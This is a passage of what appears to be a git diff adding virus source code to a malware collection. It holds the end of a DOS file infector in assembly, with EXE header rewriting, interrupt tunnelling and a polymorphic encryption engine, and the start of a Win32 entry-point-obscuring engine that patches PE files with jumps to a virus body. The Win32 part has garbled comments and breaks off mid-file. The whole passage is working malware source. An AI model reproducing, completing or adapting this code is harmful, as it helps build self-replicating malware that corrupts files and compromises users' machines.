mov ax,4202 + xor cx,cx + cwd + call call_int21 ; seek to end of file + + push dx ; filesize + push ax + push bx ; file handle + + mov bx,word ptr buffer[8] + shl bx,4 ; *16 + sub ax,bx + sbb dx,0 + mov bx,10 + div bx + mov word ptr buffer[16],ax + add ax,100 + mov word ptr buffer[0E],ax + mov word ptr buffer[14],dx + mov word ptr buffer[10],0 + + mov cs:int_ss,ss + mov cs:int_sp,sp + + mov ax,cs + cli + mov ss,ax + mov sp,offset own_stack + sti + + mov ax,cs + mov bx,offset virus_end + 50 + shr bx,4 + add ax,bx + mov es,ax + mov bp,dx + mov dx,0 + mov cx,offset virus_end + call mutate + + cli + mov sp,cs:int_sp + mov ss,cs:int_ss + sti + + pop bx ; file handle + mov ah,40 + cwd + call call_int21 ; append virus to file + + push cs + pop ds + pop ax ; filesize + pop dx + add ax,cx + adc dx,0 + push bx + mov bx,0200 + div bx ; => size in pages + mov word ptr buffer[2],dx + or dx,dx + jz last_page_full + inc ax +last_page_full: + mov word ptr buffer[4],ax + + mov ax,4200 + pop bx + xor cx,cx + cwd + call call_int21 ; seek to top of file + + mov ah,40 + pop dx + pop cx + call call_int21 ; write new header to file + + mov ax,5701 + pop cx + pop dx + or cx,0F + call call_int21 ; set modified time + +close_file: + mov ah,3e + call call_int21 ; close file + + mov ah,0dh + int 21 ; reset all drives + + xor ax,ax + mov ds,ax ; DS := 0 + mov ax,word ptr cs:oldint13 + mov word ptr ds:[4c],ax + mov ax,word ptr cs:oldint13+2 + mov word ptr ds:[4e],ax + + pop es + pop ds + popa + jmp go_old21 + + +call_int21: + pushf + + db 09A ; CALL FAR xxxx:xxxx +tunneled_int21 dd ? + + ret + +tunnel_int13: + pusha + push ds + push es + xor bx,bx + mov es,bx ; ES := 0 + mov ax,0F000 + mov ds,ax ; DS := 0F000 +search_loop: + inc bx + cmp dword ptr ds:[bx],0FB80FA80 + jnz search_loop + mov ax,ds + shl eax,10 + xchg bx,ax + xchg eax,dword ptr es:[004c] ; set new int 13 + mov dword ptr cs:oldint13,eax ; save old int 13 + pop es + pop ds + popa + ret + +start_host: + db 0EA ; JMP FAR +old_ip dw ? +old_cs dw ? +old_ss dw ? +old_sp dw ? + +oldint13 dd ? +oldint03 dd ? + +initial_regs dw ? + dw ? + dw ? + dw ? + + +checksum db 06F + +buffer db 18 dup (?) + + +int_sp dw ? +int_ss dw ? + + db 28 dup (?) + +own_stack: + db 9 dup (?) + + +; Input: +; CX - byte to crypt +; DS:DX - pointer to ccode to crypt (DS must be equal to CS!) +; ES - working segment +; BP - offset the deryptor should run on later +; Output: +; CX - byte in encrypted code and decryptor +; DS:DX - pointer to decryptor end encr. code +mutate: + jmp start2 + + db 'CLME V0.62' + +start2: + push ax + push bx + push si + push di + xchg bp,ax + ; get offset the engine runs on + call flex1 +flex1: + pop bp + sub bp,offset flex1 + ; save parameters + mov o_es[bp],es + mov o_ds[bp],ds + mov o_dx[bp],dx + mov o_cx[bp],cx + mov o_ax[bp],ax + ; init the engine + xor di,di ; it begins at ES:0 to create the decryptor + mov step_count[bp],0 ; begin with step 0 + mov int_allready[bp],0 ; no int 8/1c generated yet +next_round: + ; + call rnd_get + mov bl,12 ; random values 0..E + call rnd_limited + xor ah,ah + xchg cx,ax + jcxz next_round ; 0 not allowed + cmp step_count[bp],2 + ja after_step_2 + add cx,10 ; up to step 2 use more junk +after_step_2: + cmp step_count[bp],6 ; before last step ? + jz step_6 ; yes + call rnd_get + mov bl,33 ; random value from 0..5 + call rnd_limited + cmp al,5 + jz case_1 + cmp al,4 + jz case_2 + cmp al,3 + jz case_3 + cmp al,2 + jz case_4 + cmp al,1 + jz case_5 + ; generate a int 8/1c + cmp di,10 ; within the first 16 byte ? + jb do_not_gen_int ; yes then do not generate + cmp int_allready[bp],1 ; allready generated such a int ? + jz do_not_gen_int ; yes then do not generate + mov int_allready[bp],1 ; set flag + mov al,0cdh ; INT + stosb + call rnd_get + and ax,1 + or al,al + jz int_1c ; take INT 1c + mov al,8 ; take int 8 + jmp int_both +int_1c: + mov al,1c +int_both: + stosb ; put the int number + ;org 98 +do_not_gen_int: + loop after_step_2 + jmp junk_done + ;org 9C +case_5: + call junk1 + jmp do_not_gen_int + ;org 0A1 +case_1: + call junk2 + jmp do_not_gen_int + ;org 0A6 +case_2: + call junk3 + jmp do_not_gen_int + ;org 0AB +case_3: + call junk4 + jmp do_not_gen_int + ;org 0B0 +case_4: + call junk5 + jmp do_not_gen_int + ;org 0B5 +step_6: + call junk6 + loop after_step_2 + jmp not_step_4 + ;org 0BC +junk_done: + cmp step_count[bp],0 + jnz not_step_0 + ; Init Address + mov pos_addrinit[bp],di ; save position + inc step_count[bp] + lea si,mov_ax[bp] ; MOV AX opcode + cld + movsb + movsw ; put it + jmp next_round +not_step_0: + cmp step_count[bp],1 + jnz not_step_1 + ; Init encryption value + mov pos_encrinit[bp],di ; save position + inc step_count[bp] + lea si,mov_al[bp] ; MOV AL opcode + cld + movsw ; put it + jmp next_round +not_step_1: + cmp step_count[bp],2 + jnz not_step_2 + ; make encryption + mov pos_encrypt[bp],di + inc step_count[bp] + lea si,xor_opcode[bp] + cld + movsb + movsw + jmp next_round +not_step_2: + cmp step_count[bp],3 + jnz not_step_3 + ; make encryption value modifier + mov pos_modif[bp],di ; save postion + inc step_count[bp] + lea si,add_al[bp] ; ADD AL opcode + cld + movsw + jmp next_round +not_step_3: + cmp step_count[bp],4 + jnz not_step_4 + ; make address increase + mov pos_increase[bp],di ; save position + inc step_count[bp] + lea si,inc_ax[bp] ; INC AX opcode + cld + movsb + jmp next_round + +not_step_4: + cmp step_count[bp],5 + jnz not_step_5 + ; make address compare + mov pos_addrcmp[bp],di ; save position + inc step_count[bp] + lea si,cmp_ax[bp] ; CMP AX,value opcode + cld + movsw + movsw + jmp next_round + +not_step_5: + ; end decryptor with JNZ + mov pos_loopjmp[bp],di + lea si,jnonz[bp] ; JNZ (backwards to begin of loop) + cld + movsw ; put it + ; choose encryption value + call rnd_get + mov encr_val[bp],al + ; and put it into the opcode with initializises it + mov di,pos_encrinit[bp] + inc di + cld + stosb + ; + call choose_addrreg + mov di,pos_addrinit[bp] + add byte ptr es:[di],al + mov di,pos_increase[bp] + add byte ptr es:[di],al + mov di,pos_addrcmp[bp] + inc di + add byte ptr es:[di],al + mov di,pos_encrypt[bp] + inc di + inc di + cmp al,3 + jnz is_not_bx + add byte ptr es:[di],9 + jmp zero_encryption_value +is_not_bx: + add byte ptr es:[di],al +zero_encryption_value: + ; choose the value for the encryption modifying + call rnd_get + or al,al + jz zero_encryption_value + mov modif_val[bp],al + ; insert it into the modifier opcode + mov di,pos_modif[bp] + inc di + mov byte ptr es:[di],al + ; fix the address in the address init + mov di,pos_addrinit[bp] + inc di + mov ax,pos_loopjmp[bp] + inc ax + inc ax + add ax,o_ax[bp] + stosw + ; fix the address in the address compare + mov di,pos_addrcmp[bp] + inc di + inc di + add ax,o_cx[bp] + inc ax + stosw + ; fix the jnz that makes the loop + mov di,pos_loopjmp[bp] + mov ax,pos_encrypt[bp] + sub ax,di + dec ax + dec ax + inc di + stosw ; stores as word but higher byte will be overwritten + ; copy the code to crypt after the decryptor + mov ds,o_ds[bp] + mov si,o_dx[bp] + mov di,pos_loopjmp[bp] + inc di + inc di + mov cx,o_cx[bp] + cld + rep movsb + ; encrypt the whole stuff + mov al,encr_val[bp] + mov di,pos_loopjmp[bp] + inc di + inc di + mov cx,o_cx[bp] + mov ah,modif_val[bp] +encryption_loop: + xor es:[di],al + inc di + add al,ah + loop encryption_loop + ; calculate result values + mov cx,pos_loopjmp[bp] + inc cx + inc cx + add cx,o_cx[bp] + push es + pop ds + xor dx,dx + ; leave the engine + pop di + pop si + pop bx + pop ax + ret + + ;org 212 +junk1: + push cx + call rnd_get + push bx + mov bl,1c ; random value 0..9 + call rnd_limited + pop bx + lea bx,junk_table[bp] + xor ah,ah + add bx,ax ; index in thhe table + mov al,byte ptr ds:[bx] ; get opcode + cld + stosb ; put it + ; add second byte + call choose_reg8 + xchg al,bl + mov cl,3 + shl bl,cl + call choose_reg8 + add al,bl + add al,0C0 + cld + stosb + pop cx + ret + + ;org 23Dh +junk2: + push cx + call rnd_get + push bx + mov bl,1c ; random value 0..9 + call rnd_limited + pop bx + lea bx,junk_table[bp] + xor ah,ah + add bx,ax + mov al,byte ptr ds:[bx] ; get opcode + inc al ; make it a word operation + cld + stosb ; put it + call choose_reg16 + xchg al,bl + mov cl,3 + shl bl,cl + call choose_reg16 + add al,bl + add al,0C0 + cld + stosb ; put second byte + pop cx + ret + + ;org 26A +junk3: + mov al,80 ; prefix 80 + jmp prefix_junk + ;org 26E +junk4: + mov al,81 ; prefix 81 + jmp prefix_junk + ;org 272 +junk5: + mov al,83 ; prefix 83 + jmp prefix_junk + ;org 276 +prefix_junk: + push cx + cld + stosb ; put the prefix + xor ah,ah + xchg al,dl ; save prefix to DL + call rnd_get + mov bl,24 + call rnd_limited ; random value 0..7 + mov cl,3 + shl al,cl + add al,0c0 + xchg al,bl ; save to bl + cmp dl,80 ; prefix was 80 ? + jnz its_word_register ; no then word reg + call choose_reg8 + jmp reg_choosen +its_word_register: + call choose_reg16 +reg_choosen: + add al,bl ; add to previous calculated + cld + stosb ; put it + call rnd_get + cmp dl,81 ; was prefix 81 ? + jz put_word_data ; then put word data + cld + stosb ; put data + jmp putted_data +put_word_data: + cld + stosw ; put data +putted_data: + pop cx + ret + ;org 2AE +junk6: + push cx + call rnd_get + and al,1 + lea bx,junk_part[bp] + xor ah,ah + add bx,ax + mov al,byte ptr ds:[bx] ; get opcode + cld + stosb ; put it + call choose_reg16 ; insert regs into second byte + xchg al,bl + mov cl,3 + shl bl,cl + call choose_reg16 + add al,bl + add al,0c0 + cld + stosb ; put it + pop cx + ret + + ;org 2D4 + ; Get a random value in AX +rnd_get: + push bx + push cx + lea bx,last_rnd[bp] + in al,40 + xchg al,cl + in al,40 + xchg al,ah + in al,40 +assume ds:nothing + add ax,word ptr cs:[bx] + rol ax,cl + mov word ptr cs:[bx],ax +assume ds:_TEXT + pop cx + pop bx + ret + + ; 2ef +rnd_limited: + ; limited random number + ; 0...FFh/BL + push dx + xor dx,dx + call rnd_get + mov ah,0 + div bl + pop dx + ret + ; 2fb + +choose_addrreg: + call rnd_get + push bx + mov bl,24 + call rnd_limited + pop bx + cmp al,3 + jz adress_reg_choosen ; BX is ok + cmp al,6 + jb choose_addrreg ; only ok for SI,DI +adress_reg_choosen: + ret + +; org 30e +choose_reg8: + call rnd_get + push bx + mov bl,24 ; random value 0..7 + call rnd_limited + pop bx + or al,al + jz choose_reg8 ; 0 not allowed (AL) + cmp al,3 + jz choose_reg8 ; 3 not ok (BL) + cmp al,7 + jz choose_reg8 ; 7 not ok (BH) + ret + + ;org 325 +choose_reg16: + call rnd_get + push bx + mov bl,24 ; random value 0..7 + call rnd_limited + pop bx + or al,al ; 0 not ok (AX) + jz choose_reg16 + cmp al,3 ; 3 not ok (BX) + jz choose_reg16 + cmp al,4 ; 4 not ok (SP) + jz choose_reg16 + cmp al,6 ; 6,7 not ok (SI,DI) + jnb choose_reg16 + ret + + +modif_val db ? +encr_val db ? +last_rnd dw ? +step_count db ? +int_allready db ? +o_es dw ? +o_ds dw ? +o_dx dw ? +o_cx dw ? +o_ax dw ? +pos_addrinit dw ? +pos_encrinit dw ? +pos_encrypt dw ? +pos_modif dw ? +pos_increase dw ? +pos_addrcmp dw ? +pos_loopjmp dw ? + + db 0C0 ;* +junk_table db 0,8,10,18,20,28,30,84 +junk_part db 86,88 ; XCHG, MOV +mov_ax db 0B8,0,0 ; MOV AX,0 +mov_al db 0B0,0 ; MOV AL,0 +xor_opcode db 2E,30,0FE ; XOR BYTE PTR CS:[reg16],reg8 +add_al db 4,0 ; ADD AL,0 +inc_ax db 40 ; INC AX +cmp_ax db 81,0F8,0,0 ; CMP AX,0 +jnonz db 75,1E ; JNZ + +virus_end equ $ + +end start diff --git a/Win32/Virus.Win32.Spot.asm b/Win32/Virus.Win32.Spot.asm new file mode 100644 index 00000000..09e37f99 --- /dev/null +++ b/Win32/Virus.Win32.Spot.asm @@ -0,0 +1,534 @@ +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; [SIMPLE EPO TECHNIQUE ENGINE V. 0.1] ; +; ; +; ########### ########### ############ ############## ; +; ############# ############# ############## ############## ; +; ## ### ## ### ### ### ; +; ############ ############# ### ### ### ; +; ############ ############ ### ### ### ; +; ### ### ### ### ### ; +; ############# ### ############## ### ; +; ########### ### ############ ### ; +; ; +; FOR MS WINDOWS ; +; ; +; BY SL0N ; +;------------------------------------------------------------------------------; +; MANUAL: ; +; ADDRESS OF MAPPED FILE -> EDX ; +; ; +; CALL EPO ; +;------------------------------------------------------------------------------; +; MANUAL FOR RESTORE: ; +; CALL RESTORE ; +; ; +; ENTRY POINT -> EBX ; +;------------------------------------------------------------------------------; +; (+) DO NOT USE WIN API ; +; (+) EASY TO USE ; +; (+) GENERATE GARBAGE INSTRUCTIONS (1,2,3,4,5,6 BYTES) ; +; (+) USE X87 INSTRUCTIONS ; +; (+) RANDOM NUMBER OF SPOTS ; +; (+) MUTABLE SPOTS ; +; (+) RANDOM LENGTH OF JUMP ; +;------------------------------------------------------------------------------; +epo: + push esi edi ; Ñîõðàíÿåì â ñòýêå esi + ; è edi + mov [ebp+map_address],edx ; Ñîõðàíÿåì àäðåñ ôàéëà â + ; ïàìÿòè + call get_head ; Ïîëó÷àåì PE çàãîëîâîê + ; + call search_eip ; Âû÷èñëÿåì íîâóþ òî÷êó + ; âõîäà + call find_code ; Èùåì íà÷àëî êîäà â ýòîì + ; ôàéëå + call spots ; Ïîìåùàåì òóäà ïåðåõîä + ; íà âèðóñ + pop edi esi ; Âîññòàíàâëèâàåì èç ñòýêà + ; edi è esi + ret ; Âûõîäèì èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; PE HEADER SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; FILE IN MEMORY -> EDX ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; + +get_head: + ; Ïîäïðîãðàììà ïîëó÷åíèÿ + ; PE çàãîëîâêà + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + + mov ebx,[edx + 3ch] ; + add ebx,edx ; + ; + mov [ebp + PE_header],ebx ; ñîõðàíÿåì PE çàãîëîâîê + mov esi,ebx ; + mov edi,esi ; + mov ebx,[esi + 28h] ; + mov [ebp + old_eip],ebx ; Ñîõðàíÿåì ñòàðóþ òî÷êó + ; âõîäà (eip) + mov ebx,[esi + 34h] ; + mov [ebp + image_base],ebx ; Ñîõðàíÿåì + ; âèðòóàëüíûé àäðåñ + ; íà÷àëà ïðîãðàììû + popa ; Âûíèìàåì âñ¸ èç ñòýêà + ret ; Âûõîäèì èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; NEW ENTRY POINT SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +search_eip: + ; Ïîäïðîãðàììà âû÷èñëåíèÿ + ; íîâîé òî÷êè âõîäà + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + + mov esi,[ebp+PE_header] ; Êëàä¸ì â esi óêàçàòåëü + ; Íà PE çàãîëîâîê + mov ebx,[esi + 74h] ; + shl ebx,3 ; + xor eax,eax ; + mov ax,word ptr [esi + 6h] ; Êîëè÷åñòâî îáúåêòîâ + dec eax ; (íàì íóæåí ïîñëåäíèé-1 + mov ecx,28h ; çàãîëîâîê ñåêöèè) + mul ecx ; * ðàçìåð çàãîëîâêà + add esi,78h ; òåïåðü esi óêàçûâàåò + add esi,ebx ; íà íà÷àëî ïîñëåäíåãî + add esi,eax ; çàãîëîâêà ñåêöèè + + mov eax,[esi+0ch] ; + add eax,[esi+10h] ; Ñîõðàíÿåì íîâóþ òî÷êó + mov [ebp+new_eip],eax ; âõîäà + + popa ; Âûíèìàåì âñ¸ èç ñòýêà + + ret ; Âûõîäèì èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; FIND START OF CODE SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +find_code: + ; Ïîäïðîãðàììà ïîèñêà íà÷àëà + ; êîäà + + mov esi,[ebp+PE_header] ; Êëàä¸ì â esi óêàçàòåëü + ; Íà PE çàãîëîâîê + + mov ebx,[esi + 74h] ; + shl ebx,3 ; Ïîëó÷àåì + xor eax,eax ; + mov ax,word ptr [esi + 6h] ; Êîëè÷åñòâî îáúåêòîâ +find2: + mov esi,edi ; + dec eax ; + push eax ; (íàì íóæåí ïîñëåäíèé-1 + mov ecx,28h ; çàãîëîâîê ñåêöèè) + mul ecx ; * ðàçìåð çàãîëîâêà + add esi,78h ; òåïåðü esi óêàçûâàåò íà + add esi,ebx ; íà÷àëî ïîñëåäíåãî + ; çàãîëîâêà + add esi,eax ; ñåêöèè + mov eax,[ebp+old_eip] ;  eax ëîæèì òî÷êó âõîäà + mov edx,[esi+0ch] ;  edx àäðåñ êóäà áóäåò + ; ìàïèòüñÿ + ; òåêóùàÿ ñåêöèÿ + cmp edx,eax ; Ïðîâåðÿåì + pop eax ; Âûíèìàåì èç ñòýêà eax + jg find2 ; Åñëè áîëüøå èùåì äàëüøå + add edx,[esi+08h] ; Äîáàâëÿåì âèðòóàëüíûé + ; ðàçìåð ñåêöè + cmp edx,[ebp+old_eip] ; Ïðîâåðÿåì + jl find2 ; Åñëè ìåíüøå èùåì äàëüøå + + mov edx,[esi+0ch] ; Äàëåå âû÷èñëÿåì + ; ôèçè÷åñêîå + mov eax,[ebp+old_eip] ; ñìåùåíèå êîäà â ôàéëå + sub eax,edx ; + add eax,[esi+14h] ; + add eax,[ebp+map_address] ; È ïîòîì äîáàâëÿåì áàçó + ; ïàìÿòè + + mov [ebp+start_code],eax ; Ñîõðàíÿåì íà÷àëî êîäà + + or [esi + 24h],00000020h or 20000000h or 80000000h + ; Ìåíÿåì àòòðèáóòû + ; êîäîâîé ñåêöèè + + mov eax,[esi+08] ; Âû÷èñëÿåì ðàçìåð + sub eax,[ebp+old_eip] ; òîé ÷àñòè êîäîâîé ñåêöèè, + mov edx,[esi+10h] ; ãäå ìîæíî ðàçìåùàòü + sub edx,eax ; ïÿòíà + mov [ebp+size_for_spot],edx ; + + ret ; Âîçâðàò èç ïðîöåäóðû + +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOTS GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +spots: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; ïÿòåí + + mov ecx,1 ; Êëàä¸ì â ecx åäèíèöó + ; + call reset ; Ïîäãîòàâëèâàåì äàííûå + call num_spots ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + ; ýòî áóäåò êîë-âî ïÿòåí +tred: + call save_bytes ; Ñîõðàíÿåì çàòèðàåìû áàéòû + call gen_spot ; Ãåíåðèðóåì ïÿòíî + + inc ecx ; Óâåëè÷èâàåì ecx íà åäèíèöó + cmp ecx,[ebp+n_spots] ; Âñå ïÿòíà ñãåíåðèðîâàíû + jne tred ; Åñëè íåò, òî ãåíåðèðóåì + + call save_bytes ; Ñîõðàíÿåì ïîñëåäíèå áàéòû + call gen_final_spot ; È ãåíåðèðóåì ïîñëåäíåå + ; ïÿòíî + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOT GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +gen_spot: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; îäíîãî ïÿòíà + + push eax ecx ; Ñîõðàíÿåì eax è ecx + + call len_sp_jmp ; Ïîëó÷àåì ñëó÷àéíóþ äëèíó + xchg eax,ebx ; ïðûæêà ïÿòíà + + call testing ; Ïðîâåðÿåì, ÷òîáû ïÿòíî + jc quit2 ; íå âûõîäèëî çà êîäîâóþ + ; ñåêöèþ + push ebx + xor bx,bx + dec bx + mov ecx,[ebp+num1] ; Ãåíåðèðóåì ïåðâóþ ïàðòèþ + call garbage ; ìóñîðà + pop ebx + + mov al,0e9h ; + stosb ; + mov eax,0 ; Ãåíåðèðóåì jmp + add eax,ebx ; + add eax,ecx ; + stosd ; + + push ebx + xor bx,bx + dec bx + mov ecx,[ebp+num2] ; Ãåíåðèðóåì âòîðóþ ïàðòèþ + call garbage ; ìóñîðà + pop ebx + + sub edi,[ebp+num2] ; + add edi,[ebp+num1] ; Êîððåêòèðóåì edi + add edi,ebx ; +quit2: + pop ecx eax ; Âîññòàíàâëèâàåì ecx è eax + + ret ; Âîçâðàò èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; LAST SPOT GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +gen_final_spot: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; ôèíàëüíîãî ïÿòíà + + push eax ecx ; Ñîõðàíÿåì eax è ecx + + jc not_big ; Åñëè äëèíà íå ïðåâûøàåò + inc [ebp+n_spots] ; ðàçìåðà êîäîâîé ñåêöèè, òî +not_big: ; Óâåëè÷èì êîë-âî ïÿòåí + mov ecx,[ebp+num1] ; Ãåíåðèðóåì ìóñîðíûå + call garbage ; èíñòðóêöèè + + push edi ; Ñîõðàíÿåì edi + sub edi,[ebp+start_code] ; Ïîäãîòàâëèâàåì äëèíó jmp'a + mov ebx,edi ; äëÿ ïîñëåäíåãî ïÿòíà + pop edi ; Âîññòàíàâëèâàåì edi + + mov al,0e9h ; + stosb ; + mov eax,0 ; + sub eax,5 ; Ãåíåðèðóåì ôèíàëüíîå + sub eax,ebx ; ïÿòíî + add eax,[ebp+new_eip] ; + sub eax,[ebp+old_eip] ; + stosd ; + + mov ecx,[ebp+num2] ; Ãåíåðèðóåì âòîðóþ ïàðòèþ + call garbage ; ìóñîðíûõ èíñòðóêöèé + + pop ecx eax ; Âîññòàíàâëèâàåì ecx è eax + ret ; Âîçâðàò èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOTS GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; ADDRESS OF SAVING BYTES -> EDI ; +; QUANTITY OF BYTES -> EBX ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +save_bytes: + ; Ïîäïðîãðàììà ñîõðàíåíèÿ + ; çàìåíÿåìûõ áàéò + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + call length1 ; Ãåíåðèðóåì äëèíû ìóñîðíûõ + ; èíñòðóêöèé + mov ebx,[ebp+num1] ; Ïîìåùàåì â ebx ïåðâóþ + add ebx,[ebp+num2] ; è âòîðóþ äëèíû + add ebx,5 ; Äîáàâëÿåì ê ebx - 5 + + mov esi,edi ; Ñîõðàíÿåì â áóôåðå ñ + mov edi,[ebp+pointer] ; íà÷àëà ñìåùåíèå â ïàìÿòè + mov eax,esi ; íà ñîõðàíÿåìûå áàéòû + stosd ; + mov ecx,ebx ; Ïîñëå ýòîãî ñîõðàíÿåì â + mov eax,ecx ; áóôåðå êîë-âî ñîõðàíÿåìûõ + stosd ; áàéò + + rep movsb ; È â ñàìîì êîíöå ñîõðàíÿåì + mov [ebp+pointer],edi ; â áóôåðå ñàìè áàéòû + ; + popa ; Âûíèìàåì âñ¸ èç ñòýêà + ret ; Âîçâðàò èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; RESTORE SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; OLD ENTRY POINT -> EBX ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +restore: + ; Ïîäïðîãðàììà + ; âîññòàíîâëåíèÿ ñîõðàí¸ííûõ + ; áàéò + + cld ; Ïîèñê âïåð¸ä + lea esi,[ebp+rest_bytes] ;  esi óêàçàçàòåëü íà áóôåð + mov edx,1 ;  edx êëàä¸ì - 1 +not_enough: + mov edi,[ebp+old_eip] ;  edi çàãðóæàåì òî÷êó + add edi,[ebp+image_base] ; âõîäà + mov ebx,edi ; Ñîõðàíÿåì edi â ebx + lodsd ;  eax ñòàðîå ñìåùåíèå + ; áàéò â ïàìÿòè + sub eax,[ebp+start_code] ; Îòíèìàåì ñìåùåíèå íà÷àëà + ; êîäà è äîáàâëÿåì + add edi,eax ; òî÷êó âõîäà + lodsd ; Çàãðóæàåì â eax êîë-âî + mov ecx,eax ; áàéò è êëàä¸ì èõ â ecx + rep movsb ; Ïåðåìåùàåì îðèãèíàëüíûå + ; áàéòû íà ñòàðîå ìåñòî + inc edx ; Ïåðåõîäèì ê ñëåäóþùåìó + cmp edx,[ebp+n_spots] ; ïÿòíó + jl not_enough ; åñëè íå âñå ïÿòíà âåðíóëè, + ; òî âîññòàíàâëèâàåì äàëüøå +quit: ; + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; LENGTH SPOT GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +length1: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; äëèí ìóñîðíûõ èíñòðóêöèé + mov eax,20 ; + call brandom32 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + test eax,eax ; â äèàïàçîíå 1..19 + jz length1 ; + + mov [ebp+num1],eax ; Ñîõðàíÿåì åãî â ïåðåìåííóþ +rand2: + mov eax,20 ; + call brandom32 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + test eax,eax ; â äèàïàçîíå 1..19 + jz rand2 ; + + mov [ebp+num2],eax ; Ñîõðàíÿåì åãî â âòîðóþ + ; ïåðåìåííóþ + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; RESET SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; 